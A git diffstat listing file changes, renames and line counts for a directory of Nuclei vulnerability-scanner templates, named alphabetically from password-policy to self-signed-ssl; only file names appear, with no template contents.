nuclei-templates/Other/password-policy.yaml | 13 +- .../Other/password-protected-consolemenu.yaml | 7 +- .../Other/password-protected.yaml | 4 +- nuclei-templates/Other/path-traversal.yaml | 70 + .../Other/payara-micro-server-detect.yaml | 5 +- ...yaml => paypal-braintree-token-11856.yaml} | 0 .../payroll-management-system-panel.yaml | 10 +- .../pbootcms-database-file-download-9469.yaml | 36 - .../pbootcms-database-file-download.yaml | 25 + nuclei-templates/Other/pbootcms-detect.yaml | 5 +- nuclei-templates/Other/pcdn-cache-node.yaml | 5 +- nuclei-templates/Other/pdf-embedder.yaml | 2 +- .../Other/pdf-signer-ssti-to-rce-9470.yaml | 22 + .../Other/pdf-signer-ssti-to-rce.yaml | 25 - .../Other/pdf-thumbnail-generator.yaml | 59 + nuclei-templates/Other/pdi-device-page.yaml | 5 +- ...pega-detect.yaml => pega-detect-9474.yaml} | 0 nuclei-templates/Other/pega-web-panel.yaml | 15 +- nuclei-templates/Other/pelco_videoxpert.yaml | 20 + ...n.yaml => pentaho-default-login-9478.yaml} | 0 ...anel-9483.yaml => pentaho-panel-9481.yaml} | 0 .../Other/peoplesoft-default-login.yaml | 10 +- .../peoplesoft_enterprise_peopletools.yaml | 20 + ...rl-scanner.yaml => perl-scanner-9484.yaml} | 0 nuclei-templates/Other/perl-status-9487.yaml | 18 - nuclei-templates/Other/perl-status.yaml | 16 + .../Other/permissions-installer.yaml | 7 +- .../Other/permissions-policy.yaml | 6 +- nuclei-templates/Other/persis-panel.yaml | 10 +- .../Other/petya-malware-variant-1.yaml | 8 +- .../Other/petya-malware-variant-3.yaml | 8 +- .../Other/petya-malware-variant-bitcoin.yaml | 8 +- nuclei-templates/Other/pexip-detect.yaml | 2 +- nuclei-templates/Other/pfsense-login.yaml | 16 +- .../Other/pgadmin-exposure-9488.yaml | 26 - nuclei-templates/Other/pgadmin-exposure.yaml | 23 + .../Other/pghero-dashboard-exposure.yaml | 17 +- nuclei-templates/Other/pgsql-detect.yaml | 91 +- nuclei-templates/Other/phabricator-login.yaml | 5 - ...aml => phalcon-framework-source-9495.yaml} | 0 nuclei-templates/Other/phinx-config.yaml | 4 +- nuclei-templates/Other/phoronix-pane.yaml | 31 - nuclei-templates/Other/phoronix-panel.yaml | 40 + nuclei-templates/Other/photo-gallery.yaml | 6 +- .../Other/php-backup-files-9497.yaml | 51 - nuclei-templates/Other/php-backup-files.yaml | 45 + .../Other/php-compatibility-checker.yaml | 6 +- nuclei-templates/Other/php-cs-cache.yaml | 4 +- ...debug-bar.yaml => php-debug-bar-9506.yaml} | 0 .../Other/php-debugbar-exposure.yaml | 7 +- nuclei-templates/Other/php-detect.yaml | 5 +- nuclei-templates/Other/php-errors-9511.yaml | 41 + nuclei-templates/Other/php-errors.yaml | 44 - nuclei-templates/Other/php-fpm-config.yaml | 6 +- nuclei-templates/Other/php-fpm-status.yaml | 3 - nuclei-templates/Other/php-fusion-detect.yaml | 8 +- nuclei-templates/Other/php-ini-9523.yaml | 32 - nuclei-templates/Other/php-ini.yaml | 21 + nuclei-templates/Other/php-mailer.yaml | 9 +- .../Other/php-proxy-detect-9544.yaml | 36 + nuclei-templates/Other/php-proxy-detect.yaml | 32 - .../Other/php-src-disclosure.yaml | 8 +- .../Other/php-timeclock-xss-9554.yaml | 27 + nuclei-templates/Other/php-timeclock-xss.yaml | 31 - ...yaml => php-user-ini-disclosure-9559.yaml} | 0 .../Other/php-zerodium-backdoor-rce.yaml | 20 +- nuclei-templates/Other/phpMyAdmin-setup.yaml | 36 - nuclei-templates/Other/phpbb-installer.yaml | 5 +- .../Other/phpcli-stack-trace.yaml | 7 +- ...t-9499.yaml => phpcollab-detect-9501.yaml} | 0 nuclei-templates/Other/phpcollab-panel.yaml | 13 +- nuclei-templates/Other/phpinfo-9517.yaml | 49 - nuclei-templates/Other/phpinfo-9521.yaml | 69 + nuclei-templates/Other/phpldap-admin.yaml | 3 +- .../Other/phpldapadmin-panel.yaml | 5 +- nuclei-templates/Other/phpldapadmin-xss.yaml | 4 +- .../Other/phpmemcached-admin-panel.yaml | 5 +- .../Other/phpminiadmin-panel.yaml | 9 +- .../Other/phpmyadmin-default-login.yaml | 19 +- .../Other/phpmyadmin-panel-9526.yaml | 33 + .../Other/phpmyadmin-panel-9528.yaml | 37 - ...ort.yaml => phpmyadmin-server-import.yaml} | 0 .../Other/phpmyadmin-setup-9531.yaml | 30 + nuclei-templates/Other/phpok-sqli-9538.yaml | 34 + .../Other/phppgadmin-panel-9539.yaml | 19 - .../Other/phppgadmin-panel-9542.yaml | 26 + .../Other/phppgadmin-version.yaml | 16 +- nuclei-templates/Other/phpsec-config.yaml | 10 +- nuclei-templates/Other/phpstan-config.yaml | 15 +- nuclei-templates/Other/phpunit-9557.yaml | 24 - .../Other/phpunit-result-cache-exposure.yaml | 5 +- nuclei-templates/Other/phpunit.yaml | 20 + nuclei-templates/Other/phpwiki-lfi-9564.yaml | 23 + nuclei-templates/Other/phpwiki-lfi-9568.yaml | 25 - nuclei-templates/Other/phpwind-installer.yaml | 5 +- nuclei-templates/Other/phuket-cms-sqli.yaml | 5 +- ...e-detect.yaml => pi-hole-detect-9581.yaml} | 0 nuclei-templates/Other/pichome-panel.yaml | 10 +- ...PI-key.yaml => pictatic-api-key-9576.yaml} | 0 .../Other/pieregister-open-redirect.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 19 - nuclei-templates/Other/pikpikcussti.yaml | 24 + .../Other/pingdom-takeover-9585.yaml | 19 + nuclei-templates/Other/pingdom-takeover.yaml | 16 - .../Other/pinpoint-unauth-9590.yaml | 26 + nuclei-templates/Other/pinpoint-unauth.yaml | 31 - .../Other/pipeline-configuration.yaml | 5 +- nuclei-templates/Other/pipfile-config.yaml | 9 +- nuclei-templates/Other/pipfile-lock.yaml | 5 +- nuclei-templates/Other/piwigo-detect.yaml | 5 +- nuclei-templates/Other/piwigo-panel.yaml | 30 +- nuclei-templates/Other/piwik-installer.yaml | 5 +- nuclei-templates/Other/pixelyoursite.yaml | 4 +- .../Other/planet-estream-panel.yaml | 15 +- nuclei-templates/Other/plastic-scm-login.yaml | 6 +- nuclei-templates/Other/plausible-panel.yaml | 5 +- .../Other/plesk-obsidian-login.yaml | 12 +- nuclei-templates/Other/plesk-obsidian.yaml | 12 +- nuclei-templates/Other/plesk-onyx-login.yaml | 52 - nuclei-templates/Other/plesk-onyx.yaml | 19 + .../{plesk-stat.yaml => plesk-stat-9604.yaml} | 0 .../Other/plone-cms-detect-9607.yaml | 26 + nuclei-templates/Other/plone-cms-detect.yaml | 23 - nuclei-templates/Other/plugin.yaml | 49 - nuclei-templates/Other/pma_unauth.yaml | 2 - .../Other/pmb-directory-traversal-9611.yaml | 22 + .../Other/pmb-directory-traversal.yaml | 27 - nuclei-templates/Other/pmb-sqli.yaml | 7 +- nuclei-templates/Other/pmm-installer.yaml | 5 +- nuclei-templates/Other/pnpm-lock.yaml | 4 +- .../Other/pollbot-redirect-9622.yaml | 26 - nuclei-templates/Other/pollbot-redirect.yaml | 23 + ...com-login.yaml => polycom-login-9627.yaml} | 0 nuclei-templates/Other/polylang.yaml | 2 +- .../Other/pony-stealer-malware.yaml | 8 +- nuclei-templates/Other/pop3-detect.yaml | 11 +- nuclei-templates/Other/popup-builder.yaml | 2 +- nuclei-templates/Other/popup-maker.yaml | 2 +- ...y.yaml => portainer-init-deploy-9628.yaml} | 0 nuclei-templates/Other/portainer-panel.yaml | 8 +- nuclei-templates/Other/posh-c2-jarm.yaml | 5 +- nuclei-templates/Other/posh-c2.yaml | 6 +- .../Other/possible-AEM-secrets.yaml | 46 + nuclei-templates/Other/post-smtp.yaml | 4 +- nuclei-templates/Other/post-types-order.yaml | 2 +- .../Other/posteio-admin-panel.yaml | 4 +- .../Other/postgres-default-logins.yaml | 8 +- .../Other/postgres-exporter-metrics.yaml | 7 +- .../Other/posthog-admin-panel.yaml | 12 +- .../Other/postman-login-check.yaml | 5 +- .../postmessage-outgoing-tracker-9636.yaml | 65 - .../Other/postmessage-outgoing-tracker.yaml | 63 + .../Other/postmessage-tracker-9639.yaml | 66 + .../Other/postmessage-tracker.yaml | 65 - .../Other/powercom-network-manager.yaml | 8 +- .../Other/powercreator-cms-rce-9644.yaml | 41 + .../Other/powercreator-cms-rce.yaml | 45 - nuclei-templates/Other/powerjob-panel.yaml | 9 +- ...ogic-ion.yaml => powerlogic-ion-9648.yaml} | 0 nuclei-templates/Other/powerware-malware.yaml | 8 +- .../Other/pqube-power-analyzers.yaml | 5 +- nuclei-templates/Other/pre-commit-config.yaml | 16 +- .../Other/premium-addons-for-elementor.yaml | 4 +- .../Other/prestashop-apmarketplace-sqli.yaml | 11 +- ...etect.yaml => prestashop-detect-9651.yaml} | 0 .../Other/prestashop-installer.yaml | 5 +- nuclei-templates/Other/pretty-link.yaml | 2 +- .../Other/prison_management_system.yaml | 20 + nuclei-templates/Other/pritunl-panel.yaml | 8 +- ...te-key-9655.yaml => private-key-9656.yaml} | 0 nuclei-templates/Other/privx-panel.yaml | 7 +- .../Other/processmaker-lfi-9659.yaml | 23 + nuclei-templates/Other/processmaker-lfi.yaml | 28 - .../Other/processwire-installer.yaml | 6 +- nuclei-templates/Other/processwire-login.yaml | 12 +- nuclei-templates/Other/procfile-config.yaml | 8 +- ...-fields-for-woocommerce-file-download.yaml | 2 +- nuclei-templates/Other/production-log.yaml | 8 +- .../Other/production-logs-9664.yaml | 32 + nuclei-templates/Other/production-logs.yaml | 39 - nuclei-templates/Other/proftpd-config.yaml | 6 +- .../Other/proftpd-server-detect.yaml | 60 +- .../Other/project-insight-login.yaml | 4 - nuclei-templates/Other/prometheus-config.yaml | 5 - .../prometheus-exporter-detect-9676.yaml | 29 - .../Other/prometheus-exporter-detect.yaml | 28 + .../Other/prometheus-exporter.yaml | 6 +- ...-flags.yaml => prometheus-flags-9687.yaml} | 0 .../Other/prometheus-flags-endpoint-9685.yaml | 37 + .../Other/prometheus-metrics.yaml | 28 +- .../prometheus-pushgateway-exposed-panel.yaml | 8 +- .../Other/prometheus-targets-9690.yaml | 29 + .../Other/prometheus-targets-endpoint.yaml | 26 + .../Other/prometheus-targets.yaml | 33 - .../Other/promothoues-panel (copy 1).yaml | 17 + nuclei-templates/Other/promothoues-panel.yaml | 17 - .../proofpoint-protection-server-panel.yaml | 8 +- .../Other/proposify-takeover-9695.yaml | 16 + .../Other/proposify-takeover.yaml | 18 - .../Other/prostore-open-redirect.yaml | 2 +- .../Other/prototype-pollution-check-9697.yaml | 96 - .../Other/prototype-pollution-check.yaml | 97 + ...ider-path-9702.yaml => provider-path.yaml} | 0 nuclei-templates/Other/proxmox-panel.yaml | 8 +- .../Other/proxy-wpad-exposure.yaml | 15 +- .../Other/prtg-default-login.yaml | 5 +- ...detect-9703.yaml => prtg-detect-9706.yaml} | 0 ...erprint.yaml => ptr-fingerprint-9707.yaml} | 0 .../Other/public-tomcat-manager-9709.yaml | 10 +- nuclei-templates/Other/pubspec-config.yaml | 18 +- nuclei-templates/Other/pulmi-login-check.yaml | 5 +- .../Other/pulsar-admin-console.yaml | 14 +- .../Other/pulsar-adminui-panel.yaml | 14 +- .../Other/pulsar360-admin-panel.yaml | 9 +- .../Other/pulse-secure-panel-9714.yaml | 27 - .../Other/pulse-secure-panel.yaml | 20 + ...l => puppet-node-manager-detect-9720.yaml} | 0 .../Other/puppetboard-panel-9716.yaml | 45 + nuclei-templates/Other/puppetboard-panel.yaml | 22 - .../Other/puppetdb-dashboard.yaml | 14 +- .../Other/puppetserver-detect-9721.yaml | 30 + .../Other/puppetserver-detect.yaml | 40 - nuclei-templates/Other/pupyc2.yaml | 4 +- .../Other/pure-storage-login.yaml | 4 - nuclei-templates/Other/put-m-enb.yaml | 29 - .../Other/put-method-enabled.yaml | 24 + nuclei-templates/Other/putMethod-1.yaml | 36 + nuclei-templates/Other/putMethod-2.yaml | 37 + ...yaml => putty-private-key-disclosure.yaml} | 0 nuclei-templates/Other/pyload-panel.yaml | 8 +- nuclei-templates/Other/pypi-token.yaml | 5 +- .../Other/pypicloud-panel-9734.yaml | 35 + nuclei-templates/Other/pypicloud-panel.yaml | 28 - nuclei-templates/Other/pypiserver-detect.yaml | 5 +- ...36.yaml => pyproject-disclosure-9737.yaml} | 0 nuclei-templates/Other/pyproject-toml.yaml | 7 +- .../Other/pyramid-debug-toolbar-9740.yaml | 8 +- ...=> pyspider-unauthorized-access-9743.yaml} | 0 ...ml => python-app-sql-exceptions-9744.yaml} | 0 .../Other/python-metrics-9747.yaml | 25 + nuclei-templates/Other/python-metrics.yaml | 29 - nuclei-templates/Other/python-scanner.yaml | 13 +- nuclei-templates/Other/qBittorrent-panel.yaml | 8 +- nuclei-templates/Other/qcubed-xss.yaml | 5 - .../Other/qdpm-info-leak-9754.yaml | 29 + nuclei-templates/Other/qdpm-info-leak.yaml | 25 - nuclei-templates/Other/qdpm-login-panel.yaml | 8 +- ...ng-next-generation-firewall-rce-9755.yaml} | 0 .../Other/qibocms-file-download.yaml | 5 +- .../Other/qihang-media-disclosure-9762.yaml | 29 + .../Other/qihang-media-disclosure-9764.yaml | 23 - .../Other/qizhi-fortressaircraft-unauth.yaml | 6 +- nuclei-templates/Other/qlik-sense-server.yaml | 14 +- nuclei-templates/Other/qmail-admin-login.yaml | 16 +- .../Other/qnap-photostation-panel.yaml | 13 +- nuclei-templates/Other/qnap-qts-panel.yaml | 27 +- nuclei-templates/Other/qnap_nas_detect.yaml | 4 - .../Other/qualcomm-voip-router.yaml | 46 +- nuclei-templates/Other/qualtrics-login.yaml | 7 +- .../Other/quantum-scalar-detect.yaml | 11 +- nuclei-templates/Other/quasar-rat-c2.yaml | 5 +- .../Other/{2378487680.yaml => quasar.yaml} | 0 nuclei-templates/Other/questdb-console.yaml | 17 +- nuclei-templates/Other/quilium-panel.yaml | 5 +- .../qvidium-management-system-exposed.yaml | 6 +- .../qvisdvr-deserialization-rce-9774.yaml | 46 + .../Other/qvisdvr-deserialization-rce.yaml | 42 - .../Other/r-webserver-login-9956.yaml | 22 - nuclei-templates/Other/r-webserver-login.yaml | 19 + .../Other/rabbitmq-dashboard-9776.yaml | 17 - .../Other/rabbitmq-dashboard-9779.yaml | 15 + .../Other/rabbitmq-default-admin-9782.yaml | 27 - .../Other/rabbitmq-default-admin.yaml | 25 + ....yaml => rabbitmq-default-login-9783.yaml} | 0 nuclei-templates/Other/rabbitmq-detect.yaml | 62 +- .../Other/rabbitmq-exporter-metrics.yaml | 7 +- .../Other/rack-mini-profiler-9792.yaml | 21 + .../Other/rack-mini-profiler.yaml | 21 - nuclei-templates/Other/racksnet-login.yaml | 9 +- nuclei-templates/Other/rackup-config-ru.yaml | 7 +- nuclei-templates/Other/radius-manager.yaml | 6 +- nuclei-templates/Other/raidenmaild.yaml | 20 + .../Other/rails-database-config.yaml | 8 +- nuclei-templates/Other/rails-debug-mode.yaml | 4 +- .../rails-secret-token-disclosure-9810.yaml | 22 + .../Other/rails-secret-token-disclosure.yaml | 25 - ...ls6-xss-9797.yaml => rails6-xss-9798.yaml} | 0 .../Other/rainloop-default-login-9811.yaml | 49 + .../Other/rainloop-default-login.yaml | 55 - nuclei-templates/Other/rancher-dashboard.yaml | 7 +- ...n.yaml => rancher-default-login-9816.yaml} | 0 nuclei-templates/Other/rancher-panel.yaml | 5 - .../Other/ranger-default-login-9827.yaml | 39 + .../Other/ranger-default-login.yaml | 39 - .../Other/ranger-detection-9829.yaml | 62 +- nuclei-templates/Other/ranger.yaml | 20 + .../Other/raspberry-shake-config.yaml | 59 +- .../Other/raspberrymatic-panel.yaml | 13 +- nuclei-templates/Other/ray-dashboard.yaml | 7 +- .../Other/razorpay-client-id.yaml | 5 +- .../Other/razorpay-clientid-disclosure.yaml | 4 +- .../Other/rcdevs-webadm-panel.yaml | 5 +- .../Other/rce-shellshock-user-agent-9831.yaml | 21 - .../Other/rce-shellshock-user-agent-9833.yaml | 17 + .../Other/rce-via-java-deserialization.yaml | 6 +- nuclei-templates/Other/rce.yaml | 5 +- .../Other/rconfig-file-upload.yaml | 72 + nuclei-templates/Other/rconfig-rce.yaml | 16 +- nuclei-templates/Other/rdap-whois.yaml | 106 +- .../{rdp-detect.yaml => rdp-detect-9839.yaml} | 0 nuclei-templates/Other/rdweb-panel.yaml | 10 +- nuclei-templates/Other/reactapp-env-js.yaml | 10 +- nuclei-templates/Other/readme-md.yaml | 5 +- .../Other/readme-takeover-9843.yaml | 16 + nuclei-templates/Other/readme-takeover.yaml | 15 - ...er.yaml => readthedocs-takeover-9846.yaml} | 0 .../Other/really-simple-captcha.yaml | 2 +- nuclei-templates/Other/really-simple-ssl.yaml | 2 +- .../Other/realor-gwt-system-sqli.yaml | 8 +- nuclei-templates/Other/red-lion-panel.yaml | 5 +- nuclei-templates/Other/redash-detection.yaml | 27 - nuclei-templates/Other/redash-installer.yaml | 5 +- nuclei-templates/Other/redash-panel.yaml | 18 + nuclei-templates/Other/redcap-detector.yaml | 5 - nuclei-templates/Other/reddittop-rss-xss.yaml | 5 +- .../Other/redhat-satellite-panel.yaml | 10 +- nuclei-templates/Other/redirection.yaml | 2 +- nuclei-templates/Other/redis-config.yaml | 15 +- .../Other/redis-default-logins.yaml | 6 +- nuclei-templates/Other/redis-detect.yaml | 13 +- .../Other/redis-enterprise-panel.yaml | 6 +- .../Other/redis-exception-error.yaml | 5 +- .../Other/redis-honeypot-detect.yaml | 4 +- nuclei-templates/Other/redis.yaml | 27 + .../Other/redmine-cli-detect-9854.yaml | 9 +- nuclei-templates/Other/redmine-config.yaml | 13 +- nuclei-templates/Other/redmine-panel.yaml | 4 +- nuclei-templates/Other/redmine-settings.yaml | 8 +- nuclei-templates/Other/redux-framework.yaml | 4 +- nuclei-templates/Other/referrer-policy.yaml | 6 +- nuclei-templates/Other/reflected-xss.yaml | 39 - nuclei-templates/Other/reflection-ssti.yaml | 51 - nuclei-templates/Other/reflection.yaml | 49 +- .../Other/regenerate-thumbnails.yaml | 2 +- nuclei-templates/Other/regify-panel.yaml | 5 +- .../Other/rekognition-image-validation.yaml | 7 +- nuclei-templates/Other/remedy-axis-login.yaml | 7 +- ...t.yaml => remkon-manager-detect-9857.yaml} | 0 .../Other/remkon-manager-panel.yaml | 10 +- .../Other/remote-auth-timeout.yaml | 16 +- .../Other/remote-ui-login-9861.yaml | 19 + nuclei-templates/Other/remote-ui-login.yaml | 22 - nuclei-templates/Other/remote_support.yaml | 22 + .../Other/repetier-server-panel.yaml | 10 +- .../Other/reportico-admin-panel.yaml | 8 +- .../Other/request-based-interaction.yaml | 6 +- .../Other/residential-gateway-login.yaml | 10 +- ...aml => resin-inputfile-fileread-9868.yaml} | 0 .../Other/resin-viewfile-lfr-9875.yaml | 25 + .../Other/resin-viewfile-lfr.yaml | 27 - nuclei-templates/Other/response-ssrf.yaml | 127 - .../Other/rethinkdb-admin-console.yaml | 14 +- nuclei-templates/Other/retool-login.yaml | 9 +- .../Other/revoked-ssl-certificate.yaml | 5 +- nuclei-templates/Other/rg-uac-panel.yaml | 10 +- nuclei-templates/Other/rg-uac.yaml | 24 + nuclei-templates/Other/rg-uac_firmware.yaml | 20 + .../Other/rhadamanthys-stealer-panel.yaml | 5 +- ...etect.yaml => rhymix-cms-detect-9877.yaml} | 0 nuclei-templates/Other/riak-detect.yaml | 64 +- .../ricoh-aficio-mp-w5100-webserver.yaml | 6 +- .../Other/ricoh-mp-c3004ex-webserver.yaml | 6 +- .../Other/ricoh-pro8320-webserver.yaml | 6 +- ...ord.yaml => ricoh-weak-password-9883.yaml} | 0 nuclei-templates/Other/riseup-panel.yaml | 7 +- .../Other/robomongo-credential-9885.yaml | 33 - .../Other/robomongo-credential.yaml | 28 + nuclei-templates/Other/robots-9887.yaml | 26 + .../Other/robots-txt-endpoint.yaml | 23 +- nuclei-templates/Other/robots.txt.yaml | 35 - nuclei-templates/Other/rocketchat-panel.yaml | 6 +- ...ml => rocketmq-console-exposure-9894.yaml} | 0 .../Other/rockmongo-default-credentials.yaml | 5 - ...yaml => rockmongo-default-login-9899.yaml} | 0 ...mongo-xss.yaml => rockmongo-xss-9902.yaml} | 0 nuclei-templates/Other/rollup-js-config.yaml | 7 +- nuclei-templates/Other/room-alert-detect.yaml | 10 +- .../Other/roundcube-log-disclosure-9905.yaml | 25 - .../Other/roundcube-log-disclosure-9906.yaml | 21 + .../Other/roundcube-webmail-portal.yaml | 11 +- .../Other/routeros-login-9909.yaml | 4 - nuclei-templates/Other/routes-ini.yaml | 40 +- nuclei-templates/Other/roxy-fileman.yaml | 17 +- .../Other/roxyfileman-fileupload.yaml | 20 +- .../Other/royalevent-management-panel.yaml | 8 +- .../Other/royalevent-management-xss.yaml | 10 +- .../Other/royalevent-stored-xss.yaml | 5 +- .../Other/rpcbind-portmapper-detect.yaml | 13 +- .../Other/rsa-self-service-9910.yaml | 25 - .../Other/rsa-self-service-9912.yaml | 23 + .../Other/rseenet-default-login-9913.yaml | 35 - .../Other/rseenet-default-login.yaml | 39 + ...t-detect.yaml => rseenet-detect-9916.yaml} | 0 nuclei-templates/Other/rsshub-detect.yaml | 5 +- ...o-detect.yaml => rstudio-detect-9919.yaml} | 0 .../Other/rsyncd-service-detect.yaml | 12 +- nuclei-templates/Other/rt-n16.yaml | 20 + nuclei-templates/Other/rtsp-detect.yaml | 15 +- nuclei-templates/Other/rubocop-config.yaml | 9 +- .../ruby-on-rails-framework-exceptions.yaml | 3 - nuclei-templates/Other/ruby-open-rce.yaml | 36 - nuclei-templates/Other/ruby-rail-storage.yaml | 6 +- nuclei-templates/Other/rubygems-key.yaml | 5 +- .../Other/ruckus-unleashed-panel.yaml | 14 +- .../Other/ruckus-wireless-admin-login.yaml | 15 +- .../Other/ruckus-wireless-default-login.yaml | 14 +- .../Other/ruijie-EG-fileDown.yaml | 2 - nuclei-templates/Other/ruijie-EWEB-rce.yaml | 5 +- ...-passLeak.yaml => ruijie-eg-passleak.yaml} | 0 .../Other/ruijie-eg-password-leak-9922.yaml | 45 + .../Other/ruijie-eg-password-leak.yaml | 39 - .../Other/ruijie-eg-rce-9925.yaml | 54 + .../Other/ruijie-eg-rce-9929.yaml | 55 - .../ruijie-information-disclosure-9931.yaml | 26 + .../Other/ruijie-information-disclosure.yaml | 22 - .../Other/ruijie-nbr-fileupload.yaml | 22 +- ...aml => ruijie-nbr1300g-exposure-9936.yaml} | 0 .../Other/ruijie-networks-lfi-9941.yaml | 31 + .../Other/ruijie-networks-lfi.yaml | 34 - .../Other/ruijie-networks-rce-9946.yaml | 5 - .../Other/ruijie-password-leak.yaml | 5 +- .../Other/ruijie-phpinfo-9952.yaml | 22 + nuclei-templates/Other/ruijie-phpinfo.yaml | 21 - nuclei-templates/Other/rundeck-log4j.yaml | 36 +- nuclei-templates/Other/rundeck-login.yaml | 10 +- nuclei-templates/Other/rundeck.yaml | 22 + .../Other/rustici-content-controller.yaml | 10 +- nuclei-templates/Other/rusty-joomla.yaml | 5 - .../Other/{nuclei_template.yaml => rxss.yaml} | 0 nuclei-templates/Other/s14.yaml | 20 + nuclei-templates/Other/s3-bucket.yaml | 3 - ...3-detect-9964.yaml => s3-detect-9963.yaml} | 0 .../Other/s3-subtakeover-9968.yaml | 20 + .../Other/s3-subtakeover-9969.yaml | 24 - nuclei-templates/Other/s3-torrent.yaml | 8 +- nuclei-templates/Other/s3cfg-config.yaml | 15 +- nuclei-templates/Other/s3hunter-9966.yaml | 14 - nuclei-templates/Other/s3hunter.yaml | 13 + nuclei-templates/Other/safe-svg.yaml | 2 +- nuclei-templates/Other/sage-detect.yaml | 5 - nuclei-templates/Other/sage-panel.yaml | 13 +- .../Other/saia-web-server-info-9980.yaml | 7 +- .../Other/salesforce-aura-9983.yaml | 19 + nuclei-templates/Other/salesforce-aura.yaml | 19 - .../Other/salesforce-credentials.yaml | 16 +- nuclei-templates/Other/saltgui-panel.yaml | 9 +- .../Other/saltstack-config-panel.yaml | 67 +- nuclei-templates/Other/samba-config-9987.yaml | 24 + nuclei-templates/Other/samba-config.yaml | 20 - nuclei-templates/Other/samba-detect-9990.yaml | 20 - nuclei-templates/Other/samba-detect.yaml | 25 + ...-panel.yaml => samba-swat-panel-9991.yaml} | 0 .../Other/samsung-printer-default-login.yaml | 5 +- .../Other/samsung-printer-detect-9993.yaml | 24 - .../Other/samsung-printer-detect.yaml | 20 + .../Other/samsung-smarttv-debug.yaml | 5 +- ...ung-wlan-ap-default-credentials-9995.yaml} | 0 .../Other/samsung-wlan-ap-rce.yaml | 18 +- .../samsung-wlan-default-login-10017.yaml | 35 + .../Other/samsung-wlan-default-login.yaml | 38 - ...-BA-rce.yaml => sangfor-ba-rce-10020.yaml} | 0 .../Other/sangfor-ba-rce-10021.yaml | 9 +- nuclei-templates/Other/sangfor-cphp-rce.yaml | 4 +- .../Other/sangfor-edr-rce-10025.yaml | 28 - .../Other/sangfor-edr-rce-10029.yaml | 24 + nuclei-templates/Other/sangfor-login-rce.yaml | 6 +- nuclei-templates/Other/sangfor.yaml | 24 + .../Other/sanhui-smg-file-read.yaml | 29 +- .../Other/sap-cloud-analytics.yaml | 10 +- ...aml => sap-hana-xsengine-panel-10037.yaml} | 0 .../Other/sap-igs-detect-10039.yaml | 39 - nuclei-templates/Other/sap-igs-detect.yaml | 33 + ...t.yaml => sap-netweaver-detect-10046.yaml} | 0 .../Other/sap-netweaver-info-leak-10051.yaml | 24 + .../Other/sap-netweaver-info-leak.yaml | 28 - .../Other/sap-netweaver-portal.yaml | 5 +- nuclei-templates/Other/sap-netweaver-rce.yaml | 20 + .../Other/sap-netweaver-webgui-10059.yaml | 20 + .../Other/sap-netweaver-webgui.yaml | 23 - nuclei-templates/Other/sap-public-admin.yaml | 2 +- nuclei-templates/Other/sap-recon-detect.yaml | 1 - .../Other/sap-redirect-10064.yaml | 22 + .../Other/sap-router-info-leak.yaml | 6 +- .../Other/sap-spartacus-detect.yaml | 5 +- .../Other/sap-successfactors-detect.yaml | 18 +- ...078.yaml => sap-web-dispatcher-10075.yaml} | 0 .../sap-web-dispatcher-admin-portal.yaml | 8 +- ...i-panel.yaml => sapfiori-panel-10033.yaml} | 0 .../Other/sar2html-rce-10082.yaml | 22 - nuclei-templates/Other/sar2html-rce.yaml | 27 + nuclei-templates/Other/sas-login-panel.yaml | 13 +- nuclei-templates/Other/sass-lint.yaml | 5 +- .../Other/sassy-social-share.yaml | 13 +- nuclei-templates/Other/satis-repository.yaml | 5 +- .../Other/sauce-access-token.yaml | 5 +- .../Other/sauter-login-10088.yaml | 21 + nuclei-templates/Other/sauter-login.yaml | 24 - .../Other/sauter-moduwebvision-panel.yaml | 8 +- .../Other/sceditor-detect-10093.yaml | 23 - .../Other/sceditor-detect-10094.yaml | 20 + .../Other/scheduledtasks-spring-boot.yaml | 2 - nuclei-templates/Other/scp-admin.yaml | 13 +- nuclei-templates/Other/screenshot.yaml | 16 +- .../Other/scribble-diffusion-panel.yaml | 5 +- nuclei-templates/Other/scriptcase-panel.yaml | 7 +- .../Other/scriptcase-prod-login.yaml | 7 +- .../Other/scrutinizer-config.yaml | 7 +- .../Other/scs-landfill-control-10098.yaml | 26 + .../Other/scs-landfill-control.yaml | 23 - nuclei-templates/Other/scx-6555n.yaml | 20 + nuclei-templates/Other/seacms-rce-10102.yaml | 25 + nuclei-templates/Other/seacms-rce.yaml | 26 - nuclei-templates/Other/seacms-sqli-10103.yaml | 37 - nuclei-templates/Other/seacms-sqli.yaml | 25 + nuclei-templates/Other/seafile-panel.yaml | 28 +- ...edia-sqli.yaml => seagate-media-sqli.yaml} | 0 nuclei-templates/Other/seagate-nas-login.yaml | 8 +- nuclei-templates/Other/searchbar.yaml | 42 - nuclei-templates/Other/searches.yaml | 42 + nuclei-templates/Other/seats-login-10107.yaml | 22 + nuclei-templates/Other/seats-login.yaml | 21 - .../Other/secgate-3600-file-upload.yaml | 21 +- .../Other/secmail-detect-10111.yaml | 25 + nuclei-templates/Other/secmail-detect.yaml | 24 - ...aml => secnet-ac-default-login-10113.yaml} | 0 nuclei-templates/Other/secnet-ac-panel.yaml | 8 +- nuclei-templates/Other/secret-token-rb.yaml | 6 +- nuclei-templates/Other/secrets-file.yaml | 8 +- .../Other/secsslvpn-auth-bypass.yaml | 11 +- nuclei-templates/Other/secui-waf-detect.yaml | 11 +- nuclei-templates/Other/secure-downloads.yaml | 59 + .../Other/securenvoy-panel-10116.yaml | 23 - nuclei-templates/Other/securenvoy-panel.yaml | 19 + .../Other/security-onion-panel.yaml | 10 +- nuclei-templates/Other/security.txt.yaml | 4 + .../Other/securityspy-detect-10119.yaml | 25 + .../Other/securityspy-detect-10121.yaml | 24 - .../Other/seeddms-default-login-10128.yaml | 40 + .../Other/seeddms-default-login.yaml | 35 - .../Other/seeddms-detect-10131.yaml | 21 - nuclei-templates/Other/seeddms-detect.yaml | 21 + nuclei-templates/Other/seeddms-panel.yaml | 18 +- nuclei-templates/Other/seeddms.yaml | 20 + .../Other/seeyon-a8-default-login.yaml | 4 +- .../Other/seeyon-monitor-default-login.yaml | 8 +- .../Other/seeyon-oa-fastjson-rce.yaml | 4 +- nuclei-templates/Other/seeyon-oa-log4j.yaml | 6 +- nuclei-templates/Other/seeyon-unauth.yaml | 8 +- nuclei-templates/Other/seeyon_fastjson.yaml | 8 +- nuclei-templates/Other/seeyon_log4j.yaml | 11 +- .../Other/segment-public-api.yaml | 5 +- .../Other/selea-ip-camera-10136.yaml | 30 + nuclei-templates/Other/selea-ip-camera.yaml | 29 - .../Other/selenium-exposure-10137.yaml | 36 - .../Other/selenium-exposure-10138.yaml | 32 + nuclei-templates/Other/selenium-grid.yaml | 7 +- nuclei-templates/Other/self-signed-ssl.yaml | 11 +- 